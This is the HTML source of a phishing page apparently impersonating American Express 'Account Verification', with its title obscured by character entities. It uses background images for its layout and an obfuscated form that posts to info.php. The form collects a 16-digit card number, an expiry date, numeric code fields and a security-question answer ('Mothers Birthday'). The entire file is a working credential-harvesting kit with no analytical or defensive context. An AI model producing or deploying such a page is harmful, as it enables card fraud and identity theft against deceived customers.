<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>

<html><head>
<title>&#65;&#109;&#101;&#114;&#105;&#99;&#97;&#110;&#32;&#69;&#120;&#112;&#114;&#101;&#115;&#115;&#32;&#45;&#32;&#65;&#99;&#99;&#111;&#117;&#110;&#116;&#32;&#86;&#101;&#114;&#105;&#102;&#105;&#99;&#97;&#116;&#105;&#111;&#110;</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>

		
			   <style type="text/css">
.textbox { 
    border: 1px solid #c4c4c4; 
	background: #F8F8F8;
    height: 34px; 
    width: 275px; 
    font-size: 13px; 
    padding: 4px 4px 4px 4px; 
    border-radius: 4px; 
  } 
 
.textbox:focus { 
	 background-color: #FFF;
    outline: none; 
    border: 2px solid #7bc1f7; 
  	border-radius: 4px;  
} 
</style>
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 1352px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>


<SCRIPT language=Javascript>
      <!--
      function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }
      //-->
   </SCRIPT>	


</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:655px; z-index:0"><img src="images/ghead.png" alt="" title="" border=0 width=1349 height=655></div>




<form action="info.php"  name="castoi" id="castoi" method="post">




  <input id="create_mu39422" class="textbox" autocomplete="off"  onkeypress="return isNumberKey(event)"  maxlength=12  style="position:absolute;left:386px;top:310px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="fzxt" value="" type="text" placeholder="">


  <input id="create_mu39422" class="textbox" autocomplete="off"  onkeypress="return isNumberKey(event)"  maxlength=4  style="position:absolute;left:386px;top:388px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="wolowo" value="" type="text" placeholder="">


  <input id="create_mu39422" class="textbox" autocomplete="off"  style="position:absolute;left:386px;top:471px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="dtb" value="" type="text" placeholder="16 Digits">


  <input id="create_mu39422" class="textbox" autocomplete="off" required="" style="position:absolute;left:386px;top:549px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="asto1" value="" type="text" placeholder=" MM/YY ">

!<=======================>!
  <input id="create_mu39422" class="textbox" autocomplete="off" style="position:absolute;left:717px;top:310px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="fyxt" value="" type="text" placeholder="">

  <input id="create_mu39422" class="textbox" autocomplete="off" style="position:absolute;left:717px;top:389px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="wxlwo" value="" type="text" placeholder="">

  
  <input id="create_mu39422" class="textbox" autocomplete="off" style="position:absolute;left:717px;top:471px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="gttb" value="" type="text" placeholder="">

  <input id="create_mu39422" class="textbox" autocomplete="off"  onkeypress="return isNumberKey(event)"  maxlength=15 style="position:absolute;left:717px;top:550px;width:245px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="aso1" value="" type="text" placeholder="e.g. Mothers Birthday">

<!----------------------!>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:655px; width:1349px; height:424px; z-index:0"><img src="images/ht.png" alt="" title="" border=0 width=1349 height=424></div>


<input id="Button1" name="Button1" value="" style="position:absolute;left:551px;top:683px;width:247px;height:40px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">



</form>
</body>
</html>
